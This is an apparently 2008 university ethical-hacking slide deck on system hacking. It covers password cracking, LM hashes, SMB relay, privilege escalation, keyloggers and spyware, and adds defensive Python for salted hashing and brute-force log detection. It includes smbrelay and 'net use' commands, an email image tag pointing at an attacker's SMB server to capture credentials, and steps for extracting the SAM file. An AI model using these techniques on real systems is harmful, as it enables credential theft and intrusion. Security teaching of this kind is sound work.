module 8 system hacking
MODULE 8
SYSTEM HACKING
Khoa CNTT (Faculty of Information Technology), ĐH Nông Lâm TP. HCM (Nong Lam University, Ho Chi Minh City), 2008, slide 2/83
Objective
- Password cracking
- Password attacks
- Identifying various password cracking tools
- Formulating countermeasures for password cracking
- Escalating privileges
- Executing applications
- Keyloggers and spyware
- Spyware and keylogger countermeasures
- Hiding files
- Understanding rootkits
- The use of steganography
- Covering tracks
Module Flow
SYSTEM HACKING
CRACKING PASSWORDS
CEH Hacking Cycle
Password Types
Types of Password Attacks
Passive Online Attack: Wire Sniffing
Passive Online Attack: Man-in-the-Middle and Replay Attacks
- Somehow get access to the communications channel
- Wait for the authentication sequence
- Proxy the authentication traffic
- No need to brute force
Active Online Attack: Password Guessing
Offline Attacks
- Offline attacks are time consuming
- The attacker has the password database
- LM hashes are much more vulnerable due to their smaller key space and shorter length
- Web services are available
- Distributed password cracking techniques are available
Mitigations:
- Use good passwords
- Remove LM hashes
- Password representations must be cryptographically secure
Considerations: Moore’s law
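As an added illustration of the last two mitigation points (this is not from the slides): a constructed two-account database is stored first with a fast, unsalted digest and then with a per-account random salt and an iterated KDF (PBKDF2-HMAC-SHA256). The account names, the shared password and the iteration count are made-up values.

```python
import hashlib
import hmac
import os

# Constructed accounts (not from the slides); alice and bob happen to share a password.
SAMPLE_USERS = {"alice": "Summer2008", "bob": "Summer2008"}


def unsalted_hash(password):
    """Fast, unsalted digest: one password always yields one value, so a single
    precomputed table (or one cracked entry) covers every account using it."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def salted_hash(password, salt, iterations=100_000):
    """Per-account random salt plus an iterated KDF (PBKDF2-HMAC-SHA256). The salt
    defeats precomputed tables; the iteration count is the tunable knob against Moore's law."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify(password, stored):
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def build_database(users, salted):
    """Return {account: stored representation} for the given accounts."""
    if salted:
        return {u: salted_hash(p, os.urandom(16)) for u, p in users.items()}
    return {u: unsalted_hash(p) for u, p in users.items()}


if __name__ == "__main__":
    weak, strong = build_database(SAMPLE_USERS, False), build_database(SAMPLE_USERS, True)
    print("unsalted digests identical:", weak["alice"] == weak["bob"])      # True
    print("salted digests identical:  ", strong["alice"] == strong["bob"])  # False
    print("verify alice:", verify("Summer2008", strong["alice"]))           # True
```

With the unsalted scheme the two accounts are indistinguishable to an attacker holding the database; with the salted scheme each account must be attacked separately and every guess costs the full iteration count.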
Offline Attacks (cont’d)
Offline Attack: Brute-force Attack
Offline Attack: Pre-Computed Hashes
Syllable Attack/ Rule-based Attack/Hybrid Attack
Distributed Network Attack
Distributed Network Attack (cont’d)
Distributed Network Attack (cont’d)
Non-Technical Attacks
http://www.defaultpassword.com/
http://www.cirt.net/cgi-bin/passwd.pl
Password Mitigation
Administrator Password Guessing
Manual Password Cracking Algorithm
Automatic Password Cracking Algorithm
Performing Automated Password Guessing
Microsoft Authentication
NTLM and LM Authentication on the Wire
What is LAN Manager Hash
LM “Hash” Generation
LM Hash
Salting
PWdump2 and PWdump3
Tool: Rainbowcrack
Password Sniffing
- Password guessing is a tough task
- Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
- If an attacker is able to eavesdrop on NT/2000 logins, this approach can spare a lot of random guesswork
How to Sniff SMB Credentials
Sniffing Hashes Using L0phtCrack
Hacking Tool: NBTDeputy
- NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.
- NBTDeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.
- This tool works well with SMBRelay. For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET server when logged-on users access "My Network Places".
Tool: ScoopLM
Hacking Tool: SMBRelay
- SMBRelay is essentially an SMB server that can capture usernames and password hashes from incoming SMB traffic.
- It can also perform man-in-the-middle (MITM) attacks.
- You must disable NetBIOS over TCP/IP and block ports 139 and 445.
- Start the SMBRelay server and listen for SMB packets:
  c:\>smbrelay /e
  c:\>smbrelay /IL 2 /IR 2
- An attacker can access the client machine by simply connecting to it via the relay address using:
  c:\>net use * \\<capture_ip>\c$
SMB Replay Attacks
- Trick the client computer into requesting a connection
- Request a connection to the client computer and collect the challenge
- Return the challenge from the client computer as own challenge
- Wait for the response from the client computer
- Return the response as own response
- The best way of fighting an SMB replay attack is by enabling SMB signing in the security policy
SMB Replay Attacks
SMBRelay Man-in-the-Middle Scenario
Redirecting SMB Logon to the Attacker
- Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication to a server of the attacker's choice
- The basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server
- When the hyperlink is clicked, the user unwittingly sends his credentials over the network
- Example tag: <img src=file://attacker_server/null.gif height=1 width=1>
Replay Attack Tool: SMBProxy
- A “passing the hash” tool that works as a proxy
- You can authenticate to a Windows NT4/2000 server by knowing only the MD4 hash
- You can mount shares, access the registry, and do anything a particular user can do with his privileges
- It does not work with SYSKEY-enabled systems
Tool: LCP
- The main purpose of the LCP program is user account password auditing and recovery in Windows NT/2000/XP/2003
Features:
- Account information imports: from the local computer, from a remote computer, from a SAM file, from an .LC file, from an .LCS file, from a PwDump file, from a Sniff file
- Password recovery: dictionary attack, hybrid of dictionary and brute force attacks, brute force attack
LCP: Screenshot
Tool: Crack
Tool: Access PassView
- Access PassView reveals the database password of every password-protected .mdb file that was created with Microsoft Access 95/97/2000/XP
- It can be useful if you have forgotten the Access database password and want to recover it
- There are two ways of getting the password of the .mdb file: drag & drop, or the command line
Limitations:
- In Access 2000/XP files, this utility cannot recover passwords that contain more than 18 characters
- This utility shows only the main database password. It cannot recover the user-level passwords
Access PassView: Screenshot
Password Recovery Tool: MS Access Database Password Decoder
- The ‘MS Access Database Password Decoder’ utility was designed to decrypt the master password stored in a Microsoft Access database
Tool: Asterisk Logger
- Asterisk Logger reveals passwords that are stored behind the asterisks
Features:
- Displays additional information about the revealed password, such as the date/time on which the password was revealed, the name of the application that contains the revealed password box, and the executable file of the application
- Allows you to save the passwords to an HTML file
Tool: Asterisk Key
- Asterisk Key shows passwords hidden under asterisks
Features:
- Uncovers hidden passwords in password dialog boxes and on web pages
- State-of-the-art password recovery engine: all passwords are recovered instantly
- Supports multilingual passwords
- Full install/uninstall support
Tool: CHAOS Generator
Password Cracking Countermeasures
- Enforce 8-12 character alphanumeric passwords
- Set the password change policy to 30 days
- Physically isolate and protect the server
- Use the SYSKEY utility to store hashes on disk
- Monitor the server logs for brute force attacks on user accounts
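An added example (not part of the course material) for the last countermeasure: a small detector run over constructed Windows security-log lines. The line layout, the accounts, the addresses and the 5-failures-in-5-minutes threshold are assumptions made for the example; event ID 529 is the NT/2000/2003 logon-failure event.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (timestamp, event ID, account, source address), not a real log.
# 529 = "Logon Failure: Unknown user name or bad password" on NT/2000/2003
# (4625 on later Windows); 528 = successful logon.
SAMPLE_LOG = """\
2008-03-12 09:00:01 529 Administrator 10.0.0.7
2008-03-12 09:00:03 529 Administrator 10.0.0.7
2008-03-12 09:00:04 529 Administrator 10.0.0.7
2008-03-12 09:00:06 529 Administrator 10.0.0.7
2008-03-12 09:00:08 529 Administrator 10.0.0.7
2008-03-12 09:00:09 529 Administrator 10.0.0.7
2008-03-12 09:15:00 529 jsmith 10.0.0.21
2008-03-12 09:40:00 529 jsmith 10.0.0.21
2008-03-12 09:41:00 528 jsmith 10.0.0.21
"""
LINE_RE = re.compile(r"^(\S+ \S+) (\d+) (\S+) (\S+)$")
LOGON_FAILURE = 529


def parse(log_text):
    """Return (timestamp, event_id, account, source) tuples; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, int(m.group(2)), m.group(3), m.group(4)))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding window per (account, source): alert once `threshold` failures fall inside
    `window`. Returns {(account, source): (first_ts, last_ts, count)}."""
    recent, alerts = defaultdict(list), {}
    for ts, event_id, account, source in sorted(events):
        if event_id != LOGON_FAILURE:
            continue
        bucket = recent[(account, source)]
        bucket.append(ts)
        while ts - bucket[0] > window:      # expire failures older than the window
            bucket.pop(0)
        if len(bucket) >= threshold:
            alerts[(account, source)] = (bucket[0], ts, len(bucket))
    return alerts


if __name__ == "__main__":
    for (acct, src), (first, last, n) in detect_bruteforce(parse(SAMPLE_LOG)).items():
        print(f"ALERT {acct} from {src}: {n} failures {first:%H:%M:%S}-{last:%H:%M:%S}")
```

The two isolated jsmith failures 25 minutes apart never reach the threshold, while the Administrator burst does; in practice the threshold and window are tuned to the site's lockout policy.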
Do Not Store LAN Manager Hash in SAM Database
- Instead of storing your user account password in cleartext, Windows generates and stores user account passwords by using two different password "hashes"
- When you set or change the password for a user account to a password that contains fewer than 15 characters, Windows generates both a LAN Manager hash (LM hash) and a Windows NT hash (NT hash) of the password
- These hashes are stored in the local Security Accounts Manager (SAM) database or in Active Directory
- The LM hash is relatively weak compared to the NT hash and so it is prone to fast brute-force attack. Therefore, you may want to prevent Windows from storing an LM hash of your password
LM Hash Backward Compatibility
- Windows 2000-based servers and Windows Server 2003-based servers can authenticate users who connect with computers that are running earlier versions of Windows
- Windows 95/98 clients do not use Kerberos for authentication
- For backward compatibility, Windows 2000 and Windows Server 2003 support: LAN Manager (LM) authentication, Windows NT (NTLM) authentication, and NTLM version 2 (NTLMv2) authentication
LM Hash Backward Compatibility
- NTLM, NTLMv2, and Kerberos all use the NT hash, also known as the Unicode hash
- The LM authentication protocol uses the “LM hash”
- It is best to prevent storage of the LM hash if you do not need it for backward compatibility. If your network contains Windows 95, Windows 98, or Macintosh clients, you may experience the following problems if you prevent the storage of LM hashes
How to Disable LM HASH
SYSTEM HACKING
Escalating Privileges
Privilege Escalation
Cracking NT/2000 Passwords
- The SAM file in Windows NT/2000 contains the user names and encrypted passwords. The SAM file is located in the %systemroot%\system32\config directory
- The file is locked while the OS is running
- Booting to an alternate OS: NTFSDOS (www.sysinternals.com) will mount any NTFS partition as a logical drive
- Backup SAM from the Repair directory: whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam
- Extract the hashes from the SAM
- Use L0phtCrack to crack the passwords
Active@ Password Changer
Active@ Password Changer: Screenshots 1
Active@ Password Changer: Screenshots 2
Active@ Password Changer: Screenshots 3
Privilege Escalation Tool: x.exe
- This tool, when executed on remote systems, creates a user called “X” with a password of “X” and adds the user to the Administrators group
SYSTEM HACKING
Executing Applications
Tool: psexec
- Lets you execute processes on other systems remotely
- Launches interactive command prompts on remote systems
Tool: remoexec
Tool: Alchemy Remote Executor
Emsa FlexInfo Pro
- Emsa FlexInfo Pro is a system information and diagnostics tool that allows you to access system details and settings
- It includes a real-time CPU and memory graph, as well as CPU speed test and memory test tools
- It includes several useful networking utilities (Bandwidth Monitor, Ping, Whois etc.) as well as an atomic time synchronizer, a browser popup blocker, and a basic keylogger
Emsa FlexInfo Pro: Screenshot
Keystroke Loggers
- If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution
- Keystroke loggers are stealth software packages that are placed between the keyboard hardware and the operating system, so that they can record every keystroke
- There are two types of keystroke loggers: software-based and hardware-based
Revealer Keylogger
- The Revealer Keylogger tool records keyboard inputs
- Revealer Keylogger's powerful log engine logs any language on any keyboard and perfectly handles dead keys
Features:
- Powerful log engine
- Full invisible mode
- Password protection
- Send log files via e-mail
Revealer Keylogger: Screenshot
Hacking Tool: Hardware Key Logger
- The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
- It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
Hardware Keylogger: Output
What is Spyware?
- Spyware is a program that records computer activities on a machine:
- Records keystrokes
- Records email messages
- Records IM chat sessions
- Records websites visited
- Records applications opened
- Captures screenshots
Spyware: Spector
- Spector is spyware that records everything that one does on the Internet
- Spector automatically takes hundreds of snapshots every hour, like a surveillance camera
- Spector works by taking a snapshot of whatever is on the computer screen and saving it away in a hidden location on the system’s hard drive
Keylogger Countermeasures
- Install antivirus software and keep the signatures up to date
- Install a host-based IDS such as the Cisco CSA agent, which can monitor your system and disable the installation of keyloggers
- Keep your hardware systems secure in a locked environment
- Frequently check the keyboard cables for attached connectors
Anti-Keylogger
- This tool can detect keylogger installations and remove them